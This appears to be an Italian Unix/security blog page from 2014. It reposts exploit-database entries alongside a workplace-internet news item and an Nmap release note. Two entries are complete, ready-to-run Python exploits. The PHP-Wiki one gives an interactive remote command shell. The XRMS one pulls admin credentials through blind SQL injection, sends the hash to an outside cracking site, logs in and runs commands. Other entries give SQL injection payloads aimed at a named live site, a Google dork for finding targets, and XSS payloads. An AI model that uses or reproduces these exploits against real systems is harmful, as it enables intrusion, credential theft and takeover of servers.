MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

29Aug/140

Un italiano su tre aggira le restrizioni Internet sul lavoro

Una ricerca OnePoll rileva che i numerosi dipendenti italiani, nonostante le regole aziendali, accedono dal lavoro a Facebook, utilizzano le app e la messaggistica.

Per i CIO non una bella notizia. Secondo i dati di una ricerca OnePoll per Samsung, infatti, un italiano su tre (32 per cento) aggira le restrizioni d’accesso a Internet (Facebook, app e messaggistica) imposte dalla propria azienda sul luogo di lavoro.
E se guardiamo la fascia di età fra i 18 e i 34 anni il dato sale al 49 per cento.

Se da una parte questo significa un miglioramento delle competenze informatiche, dall’altra è un dato che dovrebbe preoccupare i responsabili dei sistemi informativi aziendali.
Toccherà a loro riparare gli eventuali danni dell’aggiramento delle policy. Il 26 per cento tende a ignorare o ad aggirare le restrizioni usando i dispositivi personali per Twitter, il 29 per cento per servizi di video streaming, il 34 per cento per applicazioni d’archiviazione sul cloud e il 38 per cento per le app mobile.

L’indagine di Samsung che ha coinvolto 4.500 persone in sette Paesi europei (Italia, Gran Bretagna, Germania, Francia, Spagna, Belgio e Olanda) rivela che nonostante in Europa l’accesso a Facebook sia limitato o addirittura vietato al 40 per cento dei dipendenti, sono in molti a ignorare o aggirare le regole: il 34 per cento in Germania, il 32 per cento in Spagna, il 31 per cento in Belgio e Olanda.

I più indisciplinati sono gli inglesi (41 per cento), mentre i francesi (20 per cento) si distinguono per il rispetto delle norme aziendali. Il settore di mercato europeo in cui limiti e divieti sono più frequenti è l’alberghiero. Il 47 per cento delle aziende ha delle regole in materia, ma il 38 per cento del personale le infrange, un dato inferiore solo al 46 per cento degli indisciplinati che si trovano nel settore immobiliare.

”Dal punto di vista della sicurezza, è comprensibile che i datori di lavoro vogliano controllare l’uso della tecnologia da parte dei propri dipendenti”, commenta Dimitrios Tsivrikos, Consumer and Business Psychologist allo University College London. ‘‘Se però questo si traduce nell’ignorare le esigenze del professionista moderno, le aziende potrebbero andare incontro a un calo di produttività e di coinvolgimento”. (L. F.)

Fonte: http://www.cwi.it/un-italiano-su-tre-aggira-le-restrizioni-internet-sul-lavoro-21217
(7)

28Aug/140

PHP-Wiki Command Injection

###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################
 
import urllib
import urllib2
import sys
def banner():
	print "	    ____                    __                  _ __   _ "
	print "	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
	print "	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
	print "	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
	print "	             /_/ /_/         /_/                     \n"
 
 
def usage():
	banner()
	print "	[+] Usage example"
	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"
 
if len(sys.argv)< 2:
	usage()
	quit()
 
domain = sys.argv[1]
def commandexec(cmd):
	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
	cmd2 = urllib2.urlopen(cmd1)
	output = cmd2.read()
	firstloc = output.find("123:::\n") + len("123:::\n")
	secondloc = output.find("\n:::123")
	return output[firstloc:secondloc]
 
 
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
	cmd = raw_input('Run a command: ')
	if cmd == 'quit':
		print "[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print commandexec(cmd)

(9)

28Aug/140

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def sendhashaway(hash):
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  cookie = "XRMS=iseeurgettinown4d"
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  b2 = urllib2.urlopen(a1)
  output = b2.read()
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
banner()
if len(sys.argv) < 2:
  usage()
domain = sys.argv[1]
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "  [+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)

(84)

28Aug/140

F5 BIG-IP 11.5.1 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
SEC Consult Vulnerability Lab Security Advisory < 20140828-0 >
=======================================================================
              title: Reflected Cross-Site Scripting
            product: F5 BIG-IP
 vulnerable version: <= 11.5.1
      fixed version: > 11.6.0
             impact: Medium
         CVE number: CVE-2014-4023
           homepage: https://f5.com/
              found: 2014-07-07
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================
 
Vendor/product description:
- -----------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance.  From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility—and ensures your applications
are fast, secure, and available."
 
URL: https://f5.com/products/big-ip
 
 
Vulnerability overview/description:
- -----------------------------------
BIG-IP suffers from a reflected Cross-Site Scripting vulnerability,
which allow an attacker to steal other users sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
 
 
Proof of concept:
- -----------------
The following HTTP request triggers the vulnerability:
 
POST /tmui/dashboard/echo.jsp HTTP/1.1
Host: BIGIP
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 29
 
<script>alert('xss')</script>
 
The server does not properly encode user supplied information and returns it
to the user resulting in Cross-Site Scripting.
 
 
Vulnerable / tested versions:
- -----------------------------
More information can be found at:
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html
 
 
Vendor contact timeline:
- ------------------------
2014-07-08: Sending advisory and proof of concept exploit via encrypted
            channel.
2014-07-09: Vendor confirms receipt of advisory. States that fix will be
            released in the "next 6 weeks or so"
2014-07-24: Vendor provides CVE: CVE-2014-4023
2014-08-26: Vendor releases fixed version.
2014-08-28: SEC Consult releases a coordinated security advisory.
 
 
Solution:
- ---------
Update to the newest version.
 
More information can be found at:
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html
 
 
Workaround:
- -----------
No workaround available.
 
 
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
 
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
 
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15
 
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
 
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
 
EOF Stefan Viehböck / @2014

(8)

27Aug/140

Nmap Port Scanner 6.47

nmap port scanner matrix

Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth.

In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.).

Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning.

Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.

Fonte: http://packetstormsecurity.com/files/128000/Nmap-Port-Scanner-6.47.html

(37)

27Aug/140

WordPress WPtouch Mobile 3.4.5 Shell Upload

Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/| 
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/                                    
                       73 78 68 79 78 69 83 73 65 78  67 79 68 69 82
 
 
 
Found by  : k4L0ng666 (k4L0ng666@indonesiancoder.com)
 
Submited by  : Don Tukulesto (root@indonesiancoder.com)
 
Homepage  : http://indonesiancoder.com
 
Published  : August 26, 2014
 
Tested On  : OS X 10.9.4
 
=================================
 
 
====================
 
==================
| Software Info |==================
 
 
 
[>] Download      : http://downloads.wordpress.org/plugin/wptouch.3.4.5.zip
 
[>] Software      : WPtouch Mobile Plugin - Wordpress Plugin
 
[>] Plugin Version  : 3.4.5
 
[>] Vulnerability  : File upload
 
 
 
I. Proof of Concept
 
=================================
 
 
====================
You can execute any .php code into uploader, then you can find the backdoor at /wp-content/wptouch-data/
 
 
 
See Image below
 
II. Vendor patch
 
=================================
 
 
====================
Currently manufacturers do not provide patches or upgrades. 
Because it’s the new version. \m/
 
 
=================================
 
 
====================
 
WE ARE ONE UNITY, WE ARE A CODER FAMILY AND WE ARE INDONESIAN CODER
 
 
 
[>] Malang Cyber Crew ~ Magelang Cyber ~ Exploit-ID ~ Kill-9 Crew ~ Jatimcom
 
 
 
 
“People should not be afraid of their governments. Goverments should be afraid of their people.” -V
 
 
“Knowledge, like air, is vital to life. Like air, no one should be denied it.” 
 
~(^_^)~
=================================

(67)

27Aug/140

Joomla Spider 2.8.3 SQL Injection

######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
 
# Dork Google: inurl:/component/spidervideoplayer
               inurl:option=com_spidervideoplayer    
 
# Date : 2014-08-26
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
 
 
######################
 
# PoC Exploit:
 
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
 
"theme" variable is not sanitized.
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

(32)

26Aug/140

Online Time Tracking Cross Site Scripting

# Affected software: Online Time Tacking - URL: https://paydirtapp.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Type of vulnerability: XSS Stored
# Description: Paydirt is time tracking and invoicing software made for
browser-based freelancers and small businesses. It keeps track of who
you're working for so that you don't have to.
Paydirt is currently integrated with Chrome and Firefox, and will prompt
you to track time based on the websites you're using and the emails you
write.
# Proof of concept:
1 Goto https://paydirtapp.com/clients
2 Add a new client with any xss payload example ("><img src=d
onmouseover=prompt(1);>)
3 Now goto https://paydirtapp.com/clients again and XSS Works
4 Add new client then goto https://paydirtapp.com/quotes  create new
quote goto select client and XSS Works
Screenshot  http://prntscr.com/4fe3zq

(64)

26Aug/140

CMS 2.1.1 SQL Injection

# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit:  http://host/articles.php?cat_id=[SQLI]
# PoC:      http://carla-columna.de/articles.php?cat_id=[SQLI]
 
 
--- "SQLi using sqlmap."---
 
Place: GET
Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#
 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs
---
 
# Thank's

(37)

26Aug/140

ntopng 1.2.0 Cross Site Scripting

ntopng 1.2.0 XSS injection using monitored network traffic
 
ntopng is the next generation version of the original ntop, a network 
traffic probe and monitor that shows the network usage, similar to what 
the popular top Unix command does.
 
The web-based frontend of the software is vulnerable to injection of 
script code via forged HTTP Host: request header lines in monitored 
network traffic.
 
HTTP Host request header lines are extracted using nDPI traffic 
classification library and used without sanitization in several places 
in the frontend, e.g. the Host overview and specific subpages for each 
monitored host.
 
The injected code might be used to execute javascript and to perform 
management actions with the user-rights of the current ntopng user, 
which can be used to disable the monitoring function or deletion of 
accounts making the monitoring system unusable.
 
To give a coarse idea of the vulnerability the following python script 
can be used on the monitored network, afterwards the victim needs to 
browse to the Host overview / Host details in the ntopng frontend.
 
import httplib
 
conn = httplib.HTTPConnection("example.com")
headers = {"Host": "<SCRIPT>alert(\"xss\")</SCRIPT>", "Accept": 
"text/plain"}
conn.request("GET", "/", None, headers)
r1 = conn.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
 
Other users of the nDPI code might be affected as well.
 
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

(43)